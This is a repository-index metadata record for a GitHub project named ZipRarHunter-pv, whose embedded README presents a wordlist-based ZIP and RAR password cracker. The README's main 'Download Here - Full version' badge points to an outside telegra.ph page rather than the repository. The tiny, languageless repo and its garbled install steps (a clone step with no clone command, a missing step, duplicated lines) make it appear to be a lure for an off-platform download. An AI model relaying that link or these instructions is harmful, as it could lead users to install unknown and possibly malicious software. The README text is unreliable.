{"id":27974142,"url":"https://github.com/trappey304/ziprarhunter-pv","last_synced_at":"2025-05-08T00:11:53.982Z","repository":{"id":291576683,"uuid":"978060431","full_name":"trappey304/ZipRarHunter-pv","owner":"trappey304","description":"ZipRarHunter is a command-line password cracking tool designed to crack passwords for ZIP and RAR archive files using a wordlist.","archived":false,"fork":false,"pushed_at":"2025-05-05T12:11:22.000Z","size":3,"stargazers_count":32,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-08T00:11:49.099Z","etag":null,"topics":["ethical-hacking","ethical-hacking-tools","hacking-tool","hacking-tools","kali-linux-hacking","kali-linux-tools","passwordcracker","python","python3","zipcracker","ziprarhunter"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/trappey304.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-05T12:10:43.000Z","updated_at":"2025-05-06T21:20:07.000Z","dependencies_parsed_at":"2025-05-05T13:27:36.402Z","dependency_job_id":"4e3ab96e-d0e9-4e12-b191-6028627d870e","html_url":"https://github.com/trappey304/ZipRarHunter-pv","commit_stats":null,"previous_names":["trappey304/ziprarhunter-pv"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trappey304%2FZipRarHunter-pv","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trappey304%2FZipRarHunter-pv/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trappey304%2FZipRarHunter-pv/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trappey304%2FZipRarHunter-pv/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/trappey304","download_url":"https://codeload.github.com/trappey304/ZipRarHunter-pv/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252973691,"owners_count":21834108,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ethical-hacking","ethical-hacking-tools","hacking-tool","hacking-tools","kali-linux-hacking","kali-linux-tools","passwordcracker","python","python3","zipcracker","ziprarhunter"],"created_at":"2025-05-08T00:11:52.863Z","updated_at":"2025-05-08T00:11:53.973Z","avatar_url":"https://github.com/trappey304.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"## ZipRarHunter\n[![Download Now](https://img.shields.io/badge/Download%20Here-Full%20version-red)](https://telegra.ph/Download-05-02-264?pug12cvlfsv525b)\n\nZipRarHunter is a command-line password cracking tool designed to crack passwords for ZIP and RAR archive files using a wordlist. It helps automate the process of password recovery from encrypted archive files.\n\n## Features\n- **Support for ZIP and RAR Files:** ZipRarHunter works with both ZIP and RAR archives.\n- **Wordlist-based Cracking:** The tool uses a wordlist (a file containing potential passwords) to attempt cracking the password.\n\n- **Real-time Feedback:** It shows the current password being attempted in real time, so you can track the progress.\n- **Cross-platform:** This tool works on Linux, macOS, and Windows (with Python installed).\n## Requirements\n- **Python 3.x:** Ensure that Python 3 is installed on your system.\n- **Dependencies:**\n- `zipfile` (for handling ZIP files)\n- `rarfile` (for handling RAR files)\nYou can install the required Python packages using `pip`:\n```bash\npip install rarfile\n```\n## Installation\n\n1. **Clone the repository:**\n\n\n```bash\ncd ZipRarHunter\n```\n3. **Ensure all dependencies are installed. If not, run:**\n\n``` bash\npip install -r requirements.txt\n```\n\n4. **Navigate to the ZipRarHunter directory**\n   \n```bash\ncd ZipRarHunter\n```\n5. **Install the tool**\n```bash\nsudo python3 install.py\n```\n**then enter `y` for install**\n## Usage\nZipRarHunter uses command-line arguments to specify the target file, wordlist, and file type (ZIP or RAR).\n\n## Basic Usage\n```bash\nziprarhunter -f /path/to/archive.zip -w /path/to/wordlist.txt -t zip\nziprarhunter -f /path/to/archive.rar -w /path/to/wordlist.txt -t rar\n```\n## Command-line Arguments\n- `-f` or `--file`: The path to the ZIP or RAR file you want to crack.\n- `-w` or `--wordlist`: The path to the wordlist file that contains potential passwords.\n- `-t` or `--type`: The type of archive. Acceptable values are zip or rar.\n- `--no-color`: Disable colored output. By default, the output will include color for easier readability.\n## Example Commands\n1. **Crack a ZIP file with a wordlist:**\n\n``` bash\nziprarhunter -f /path/to/archive.zip -w /path/to/wordlist.txt -t zip\n```\n2. **Crack a RAR file with a wordlist:**\n\n```bash\nziprarhunter -f /path/to/archive.rar -w /path/to/wordlist.txt -t rar\n```\n3. **Disable colored output:**\n\n```bash\nziprarhunter -f /path/to/archive.zip -w /path/to/wordlist.txt -t zip --no-color\n```\n## Output Example\n```bash\nTrying password: password123\nPassword found for ZIP file: password123\n```\n## How It Works\n1. **ZIP File Cracking**: The program opens the ZIP file using the zipfile module and sets the password for each attempt. It then uses testzip() to check if the password is correct. If the password is valid, it prints the success message and exits.\n\n2. **RAR File Cracking**: The program opens the RAR file using the rarfile module and attempts to extract the first file in the archive using each password from the wordlist. If the extraction succeeds, the password is deemed correct, and the program exits.\n\n3. **Real-Time Feedback**: Each password attempt is displayed on the screen in real time. The current password is shown with color-coded output to indicate progress.\n\n## uninstallation\n```bash\ncd ZipRarHunter\n```\n```bash\ncd ZipRarHunter\n```\n```bash\nsudo python3 install.py\n```\n**Then Enter `n` for uninstall**\n\n## License\nThis project is licensed under the MIT License - see the LICENSE file for details.\n\n## Disclaimer\nThis tool is intended for educational purposes only. It should be used responsibly and legally. Unauthorized use of this tool to crack passwords without permission is illegal and unethical.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrappey304%2Fziprarhunter-pv","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftrappey304%2Fziprarhunter-pv","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrappey304%2Fziprarhunter-pv/lists"}